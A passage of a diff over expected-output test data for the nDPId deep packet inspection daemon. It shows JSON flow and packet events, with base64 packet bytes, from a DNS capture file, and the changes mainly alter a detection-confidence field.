{"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 
+00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042373854,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1559042374827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"thread_ts_msec":1559042374827,"pkt":"CFsOoYNeAAwpfKTLht1gAgVFAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTtWgANQBFzxrqAgEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACLUmUKpHzEhG"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1559042374838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"thread_ts_msec":1559042374838,"pkt":"AAwpfKTLCFsOoYNeht1gBQOmAPYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW1aAD2vA3qAoUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYtSZQqkfMSEY\/2z8HXO0ZRm3ax03ipZX3"} -00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":28,"packets-processed":22,"total-skipped-flows":0,"total-l4-payload-len":10514,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":11,"total-updates":0,"current-active-flows":4,"total-active-flows":11,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":76,"global_ts_msec":1560869882430} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1560869882430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":129,"pkt_l4_len":75,"thread_ts_msec":1560869882430,"pkt":"CFsOoYNeAAwpfKTLht1gDk+bAEsRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABERvnYANQBL7vOR3wEgAAEAAAAAAAEFc2lnb2sQdmVydGVpbHRlc3lzdGVtZQNuZXQAAAEAAQAAKRAAAAAAAAAMAAoACKFV23rIz7mH"} -00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869882430,"flow_last_seen":1560869882430,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1560869882447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":133,"pkt_l4_len":79,"thread_ts_msec":1560869882447,"pkt":"AAwpfKTLCFsOoYNeht1gBk3UAE8RPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADW+dgBPmiKR34GgAAEAAQAAAAEFc2lnb2sQdmVydGVpbHRlc3lzdGVtZQNuZXQAAAEAAcAMAAEAAQAAADwABIZbTosAACkFrAAAAAAAAA=="} -00833{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869882447,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"134.91.78.139"}} 
+00833{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869882447,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigok.verteiltesysteme.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"134.91.78.139"}} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":200000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1560869886413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":131,"pkt_l4_len":77,"thread_ts_msec":1560869886413,"pkt":"CFsOoYNeAAwpfKTLht1gDXJYAE0RQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABERzk4ANQBN7vX6xwEgAAEAAAAAAAEHc2lnZmFpbBB2ZXJ0ZWlsdGVzeXN0ZW1lA25ldAAAAQABAAApEAAAAAAAAAwACgAIYOOBSPgiBSs="} -00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":200000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869886413,"flow_last_seen":1560869886413,"flow_idle_time":200000,"flow_min_l4_payload_len":69,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869886413,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1560869886443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":108,"pkt_l4_len":54,"thread_ts_msec":1560869886443,"pkt":"AAwpfKTLCFsOoYNeht1gB6MtADYRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXOTgA2KY36x4GCAAEAAAAAAAAHc2lnZmFpbBB2ZXJ0ZWlsdGVzeXN0ZW1lA25ldAAAAQAB"} -00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869886443,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":1,"num_answers":0,"reply_code":2,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869886443,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sigfail.verteiltesysteme.net","num_queries":1,"num_answers":0,"reply_code":2,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 